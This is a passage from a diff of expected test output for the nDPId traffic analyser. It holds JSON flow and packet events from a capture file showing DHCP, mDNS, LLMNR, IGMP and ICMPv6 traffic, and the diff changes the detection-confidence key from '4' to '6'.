-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":12446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":12446,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAAFWW8sAAIAR3cwAAAAA\/\/\/\/\/wBEAEMBQgLkAQEGAKZ4S30AAAAAAAAAAAAAAAAAAAAAAAAAAAgAJ+blWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBCAAn5uVZMgQKAAIPDAtNU0VER0VXSU4xMFEOAAAATVNFREdFV0lOMTA8CE1TRlQgNS4wNw4BAwYPHyErLC4vd3n5\/P8="} -00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"msedgewin10","fingerprint":"1,3,6,15,31,33,43,44,46,47,119,121,249,252","class_ident":"MSFT 5.0"}} 
+00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"msedgewin10","fingerprint":"1,3,6,15,31,33,43,44,46,47,119,121,249,252","class_ident":"MSFT 5.0"}} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":12447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":12447,"pkt":"CAAn5uVZUlQAEjUCCABFEAJAAAAAAEARYI0KAAICCgACDwBDAEQCLAYSAgEGAKZ4S30AAAAACgACDwoAAg8KAAIEAAAAAAgAJ+blWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATVNFZGdlIC0gV2luMTAucHhlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFAQT\/\/\/8AAwQKAAICBgQKAAIDDwNsYW4zBAABUYA2BAoAAgL\/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":12461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":153,"pkt_l4_len":99,"thread_ts_msec":12461,"pkt":"MzMAAQACCAAn5uVZht1gDPpkAGMRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQACAiICIwBj3RcBE9HtAAgAAgAAAAEADgABAAEkIvGzCAAn5uVZAAMADAUIACcAAAAAAAAAAAAnAA0AC01TRURHRVdJTjEwABAADgAAATcACE1TRlQgNS4wAAYACAARABcAGAAn"} 
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":12512,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":12512,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOC1AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} 
00514{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":12513,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12513,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoICwAAAECGH8KAAIP4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} -00573{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00573{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":12524,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12524,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoIC0AAAECGH4KAAIP4AAAFpQEAAAiAPkBAAAAAQQAAADgAAD8"} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":12527,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12527,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoIC4AAAECGH0KAAIP4AAAFpQEAAAiAPoBAAAAAQMAAADgAAD8"} 
00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":12529,"pkt":"AQBeAAD7CAAn5uVZCABFAAA\/aF0AAAERZEcKAAIP4AAA+xTpFOkAK6\/OAAAAAAABAAAAAAAAC01TRURHRVdJTjEwBWxvY2FsAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":12529,"pkt":"MzMAAAD7CAAn5uVZht1gATieACsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QArEAAAAAAAAAEAAAAAAAALTVNFREdFV0lOMTAFbG9jYWwAAP8AAQ=="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":12529,"pkt":"MzMAAQADCAAn5uVZht1gD+kJACURAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD+OUU6wAl\/+MDXAAAAAEAAAAAAAALTVNFREdFV0lOMTAAAP8AAQ=="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":12529,"pkt":"AQBeAAD7CAAn5uVZCABFAABlaF4AAAERZCAKAAIP4AAA+xTpFOkAUYkoAACEAAAAAAIAAAAAC01TRURHRVdJTjEwBWxvY2FsAAAcAAEAAAA8ABD+gAAAAAAAAMUNUZ+WpOEIwAwAAQABAAAAPAAECgACDw=="} -00658{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00658{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 
00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":12529,"pkt":"AQBeAAD8CAAn5uVZCABFAAA5pMYAAAERJ+MKAAIP4AAA\/PjlFOsAJZ66A1wAAAABAAAAAAAAC01TRURHRVdJTjEwAAD\/AAE="} -00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":12530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":135,"pkt_l4_len":81,"thread_ts_msec":12530,"pkt":"MzMAAAD7CAAn5uVZht1gATieAFERAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QBR6VkAAIQAAAAAAgAAAAALTVNFREdFV0lOMTAFbG9jYWwAABwAAQAAADwAEP6AAAAAAAAAxQ1Rn5ak4QjADAABAAEAAAA8AAQKAAIP"} -00672{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12530,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12530,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 